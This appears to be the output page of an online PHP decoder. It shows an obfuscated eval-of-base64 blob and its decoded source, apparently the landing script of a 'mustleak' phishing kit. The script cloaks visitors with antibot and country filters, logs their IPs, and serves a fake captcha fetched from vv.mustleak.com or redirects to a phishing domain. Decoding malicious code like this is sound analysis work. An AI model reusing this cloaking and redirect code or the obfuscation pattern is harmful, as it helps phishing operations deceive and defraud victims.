Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); eval(gzuncompress(base64_decode('eJwNz7eSo1oARdHPme4iwLt6N..

Decoded Output download

require_once('./config.php');


require_once($root_dir . "/func.php");
$remoteip = isset($_SERVER["HTTP_CF_CONNECTING_IP"]) ? $_SERVER["HTTP_CF_CONNECTING_IP"] : $_SERVER["REMOTE_ADDR"];
$u_agent = $_SERVER["HTTP_USER_AGENT"];
if ($mustleak_bot_blocker) {
    antibot($u_agent, $remoteip);
}

if ($record_visit) {
    file_put_contents($root_dir . '/record/log.txt', $remoteip . "		" . $u_agent . "
", FILE_APPEND);
}
if ($antibotpw_api != "apikey") {
    include_once $root_dir . "/antibotpw.php";
}
if ($kill_bot_api != "apikey") {
    include_once $root_dir . "/killbot.php";
}
if ($emailaccess_only) {
    include_once $root_dir . "/emailaccess.php";
}
if ($country_lock) {
    include_once $root_dir . "/countrylock.php";
}



checker($remoteip, $u_agent, $checker_url, $activated, $url_file, $root_dir);

$grab_domain = read_json($root_dir . '/task.json', 'domain');
$clean_ip = filter_var($remoteip, FILTER_SANITIZE_NUMBER_INT);
file_put_contents($root_dir . '/record/temp_ips.txt', $clean_ip . "
", FILE_APPEND);
if ($grecaptcha) {
    if (task_timer($generate_cap, $root_dir . '/task.json', 'date0')) {
        $getcap = curll("https://vv.mustleak.com/google?key=" . $grecaptcha_key . "&domain=" . $grab_domain . "&text=" . $grecap_writeup . "&activated=" . $activated);
        file_put_contents($root_dir . "/cap.html", $getcap);
    }
    readfile($root_dir . "/cap.html");
} else {
    echo '<script>window.location.replace("' . $grab_domain . '" + window.location.search + "#" + window.location.hash.substr(1));</script>';
    debug_teleg("Sent to " . $grab_domain . blocked_res($remoteip));

}

Did this file decode correctly?

Original Code

<?php
error_reporting(0);


eval(gzuncompress(base64_decode('eJwNz7eSo1oARdHPme4iwLt6NQFeeAHCJlOYCxIernD6+qf4BHsdsOf9T/PZxnIa5hVA+FPkEDDUvwqUUwV+/gDjiiKH34eP4NWQr6lCmxSJkNgiRKMxfLOB+XaUdb6tWdwPdskp+gEppMOrB1rHpW64A7Nu9vMoWHZfd5ZtqHfdZ4HETKbVfhKZbZastfCLOTHxAHzS8TuBvnMzlwzc9sZHK63SQFW35AFzVvV0zTfaqcH8SU5mvn7S2rcGaK7d7PP+IMYZr3zVYLUJeUktLFwyFcqO5Jiuxt4j1lPAj2+8+/guVpmWlwl7L2wkreacT/PK6PKpqhAFgQ3uuJoFQlIozBjbChaRx8brMsc8VS4WlGBlibhUXky5StiJs/IkRIm7qFYeBNhljLYYYOskNYXuWDBwPU0OCj0Cq3wvnsWpFmLMNqqII4y3nRXlfQwENFbfduDJq9kYClVN4/2Wf3nuw1GS21FfFBjlNItriQvmOe4qPK6qF5OcZJ+4GW2VLWrj06SPNX3qljHelK1VVBvdBXN8kbr1rJLIuzFNNcd7aoxszPDuSXNAyuDM4i5/3TJm//JfW0VR/dkpUNNXBXEXQGyl42gWdNEo+JghFho92RDaKCr7Ki+uYRCUlm0xukPgbBRBkEvJn0Lzzq1jCAQsA3AmS3hXznZj8eARmD7PS9obL2tofUx98lE4PwVWmew0mw2GspD9xPD4y9bCntNPPNxc3EpdKVFbPpS1Z+hfZt3dr3AdJ96hqrf8IbyH0MjmPizavrl+L+R1LqfWiBEsiW3RpCyRMVsTfYo6uuzVq/Prm6uucrI4Q+5wxOE8ZRIKRGdeuBjdkh7gOKlR6PYSTQwUFLRtKjVRzFbbftkkepYTBtYIhsX6gk7gWBRaKWCWaZxyfO+JhxXu1GYY6tSniNwK8uLN9eu0SG98uQgB5rW7gy4vBZ1uB81fyjeHZDaRXiTuPwR+ZW2xKW9CsR4a/fAuc4jCWaQlCx+1nXU8Qx1njUaSdIiE7TNUl5ik7I2kEEQUhb9/fn9///sfM4NFbg==')));




?>

Function Calls

gzuncompress 2
base64_decode 2
error_reporting 1

Variables

None

Stats

MD5 c6f2587dee99f45c1d684e4308b428d8
Eval Count 2
Decode Time 47 ms